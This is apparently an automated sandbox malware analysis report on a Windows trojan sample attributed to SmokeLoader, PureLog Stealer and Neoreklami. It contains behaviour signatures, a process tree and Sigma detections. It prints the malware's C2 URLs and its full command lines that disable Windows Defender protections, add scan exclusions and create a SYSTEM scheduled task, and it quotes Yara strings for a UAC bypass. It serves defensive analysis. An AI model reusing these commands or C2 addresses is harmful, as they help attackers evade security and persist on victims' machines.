Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lgX7lgUL1w.exe

Overview

General Information

Sample name:lgX7lgUL1w.exe
renamed because original name is a hash value
Original sample name:7ff8c26a36f5a4566990745dff1594f3.exe
Analysis ID:1447097
MD5:7ff8c26a36f5a4566990745dff1594f3
SHA1:5d73bbd168fb9b1e43051340a415d95f28c40f4d
SHA256:fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813
Tags:64exetrojan
Infos:

Detection

Neoreklami, PureLog Stealer, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Neoreklami
Yara detected PureLog Stealer
Yara detected SmokeLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Drops script or batch files to the startup folder
Exclude list of file types from scheduled, custom, and real-time scanning
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies Group Policy settings
Modifies Windows Defender protection settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Windows Defender Exclusions Added - Registry
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • lgX7lgUL1w.exe (PID: 968 cmdline: "C:\Users\user\Desktop\lgX7lgUL1w.exe" MD5: 7FF8C26A36F5A4566990745DFF1594F3)
    • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5760 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 3960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • xJOdjN6fVDYC0Ta4cXD9JBiF.exe (PID: 7280 cmdline: "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s MD5: CD4ACEDEFA9AB5C7DCCAC667F91CEF13)
      • PZ3hKWPffUrXuh6Gjn77Ivv1.exe (PID: 7308 cmdline: "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe" MD5: C5A6381354CD5D1488E362C9103C1851)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • iYU7jmLL0jPLxgjctxjq1ReZ.exe (PID: 7964 cmdline: "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe" MD5: 53D14BD638C98C210E391151A8D3BCCC)
        • Install.exe (PID: 8020 cmdline: .\Install.exe /odidum "385118" /S MD5: 220A02A940078153B4063F42F206087B)
          • cmd.exe (PID: 8076 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • forfiles.exe (PID: 8144 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
              • cmd.exe (PID: 8160 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • reg.exe (PID: 8176 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • forfiles.exe (PID: 2408 cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
              • cmd.exe (PID: 7428 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • reg.exe (PID: 1352 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • forfiles.exe (PID: 8160 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
              • cmd.exe (PID: 2936 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • reg.exe (PID: 6132 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • forfiles.exe (PID: 6132 cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
              • cmd.exe (PID: 8148 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • reg.exe (PID: 5988 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • forfiles.exe (PID: 1460 cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D95C443851F70F77427B3183B1619DD3)
              • cmd.exe (PID: 7836 cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • powershell.exe (PID: 5468 cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • forfiles.exe (PID: 7248 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)
            • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 1456 cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 7696 cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • WMIC.exe (PID: 6476 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: E2DE6500DE1148C7F6027AD50AC8B891)
          • schtasks.exe (PID: 8276 cmdline: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 8284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • c12YwoiQ34lE0LgBRkxJOClX.exe (PID: 7984 cmdline: "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe" MD5: F0587649682207064554A2372966435D)
      • E6ijlcXzCqRG7r61JO0b9evs.exe (PID: 8028 cmdline: "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe" MD5: C5A6381354CD5D1488E362C9103C1851)
        • WerFault.exe (PID: 648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7336 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7372 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7412 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7488 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7668 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2916 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2356 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6632 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6816 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8152 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8188 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 5868 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
lgX7lgUL1w.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    lgX7lgUL1w.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMDDetects Windows exceutables bypassing UAC using CMSTP utility, command line and INFditekSHen
    • 0x14fa04:$s2: taskkill /IM cmstp.exe /F
    • 0x14f936:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
    • 0x14fafa:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Users\user\lgX7lgUL1w.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\lgX7lgUL1w.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMDDetects Windows exceutables bypassing UAC using CMSTP utility, command line and INFditekSHen
        • 0x14fa04:$s2: taskkill /IM cmstp.exe /F
        • 0x14f936:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
        • 0x14fafa:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
        SourceRuleDescriptionAuthorStrings
        00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000000.1201842177.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
            • 0x7584:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMDDetects Windows exceutables bypassing UAC using CMSTP utility, command line and INFditekSHen
                • 0x14fa04:$s2: taskkill /IM cmstp.exe /F
                • 0x14f936:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
                • 0x14fafa:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
                0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMDDetects Windows exceutables bypassing UAC using CMSTP utility, command line and INFditekSHen
                  • 0x19f20c:$s2: taskkill /IM cmstp.exe /F
                  • 0x19f13e:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
                  • 0x19f302:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
                  Click to see the 8 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine|base64offset|contains: <, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7696, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ProcessId: 6476, ProcessName: WMIC.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lgX7lgUL1w.exe", ParentImage: C:\Users\user\Desktop\lgX7lgUL1w.exe, ParentProcessId: 968, ParentProcessName: lgX7lgUL1w.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 5760, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /odidum "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe, ParentProcessId: 8020, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, ProcessId: 8276, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lgX7lgUL1w.exe", ParentImage: C:\Users\user\Desktop\lgX7lgUL1w.exe, ParentProcessId: 968, ParentProcessName: lgX7lgUL1w.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 5760, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /odidum "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe, ParentProcessId: 8020, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, ProcessId: 8276, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force", CommandLine: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: .\Install.exe /odidum "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe, ParentProcessId: 8020, ParentProcessName: Install.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe 